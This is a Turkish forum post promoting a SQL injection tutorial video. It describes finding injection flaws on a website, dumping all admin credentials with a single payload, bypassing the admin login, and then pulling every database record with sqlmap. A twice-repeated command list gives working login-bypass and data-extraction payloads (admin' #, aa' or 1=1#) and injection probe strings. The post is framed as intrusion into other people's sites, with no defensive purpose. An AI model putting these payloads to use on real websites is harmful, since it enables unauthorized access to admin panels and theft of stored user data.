P@LA
Cool Çırak
Sql injection 5 lwl ) Web sitesinde öncelikle sql zaafı deniyoruz manuel olarak ve bulduğumuz zaaflardan kulanıcı admin ilgilerini tek komut uygulayarak Tüm admin bilgilerini web sitesi üzerinde çıkartabiliyoruz ardından admin login kısmını bypass edip admin peneline girebiliyoruz ardından ise auto kullanarakta sqlmaptanda tüm databilgilere erişebiliriz yani hem manuel hemde auto yöntemini kullanıyoruz
Yaş kısıtlaması var tehdit olarak algılandı için youtubeden girmeniz gerekir
Youtube Link
Komutlar
admin' # (admin panel giriş bypass)
aa' or 1=1# (Admin bilgilerini çıkart)
Sql zaafını Tespit et
1'
'admin'__'
'+OR+1=1--
'OR1=1--'
'--
'--'
Yaş kısıtlaması var tehdit olarak algılandı için youtubeden girmeniz gerekir
Youtube Link
Komutlar
admin' # (admin panel giriş bypass)
aa' or 1=1# (Admin bilgilerini çıkart)
Sql zaafını Tespit et
1'
'admin'__'
'+OR+1=1--
'OR1=1--'
'--
'--'
Son düzenleme:
